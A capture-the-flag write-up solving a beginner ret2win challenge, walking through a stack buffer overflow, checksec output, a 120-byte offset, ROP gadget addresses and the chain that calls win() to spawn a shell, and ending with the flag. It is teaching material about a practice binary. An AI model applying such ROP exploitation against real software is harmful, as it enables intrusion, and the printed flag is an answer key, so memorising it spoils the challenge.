Baby's First Step - Solution

Challenge Analysis

This is a classic buffer overflow ret2win challenge.

Vulnerability

The vuln() function has a buffer overflow:

• Allocates 100 bytes for buffer (char buf[100])
• But reads 0x100 (256) bytes with read(STDIN_FILENO, buf, 0x100)
• This allows us to overwrite the return address

Binary Protections

Arch:       amd64-64-little
RELRO:      Full RELRO
Stack:      No canary found  ← We can overflow!
NX:         NX enabled        ← Can't execute shellcode on stack
PIE:        No PIE            ← Fixed addresses

Goal

Call the win() function with correct arguments:

• rdi = 0x1337133713371337
• rsi = 0xdeadbeef13377331

Solution

Step 1: Find the offset

Using cyclic pattern, we found the offset to return address is 120 bytes.

Stack layout:

[buffer: 112 bytes] [saved rbp: 8 bytes] [return address: 8 bytes]

Step 2: Build ROP chain

The binary provides a gift() function with ROP gadgets:

• pop rdi; ret at 0x4012c2
• pop rsi; ret at 0x4012c4

ROP chain:

padding (120 bytes)
pop_rdi gadget
arg1 (0x1337133713371337)
pop_rsi gadget  
arg2 (0xdeadbeef13377331)
win function address (0x40121b)

Step 3: Exploit

The win function checks the arguments and if correct, spawns /bin/sh using execve().

Flag

PCC{`oh_l00k_maa_my_f1rst_ret2w1n_XESSMQF80FMwvL43HDPf`}

Tools Used

• checksec - Check binary protections
• gdb - Debug and test payload
• objdump - Disassemble binary to find addresses
• ROPgadget - Find ROP gadgets
• pwntools - Create and send exploit payload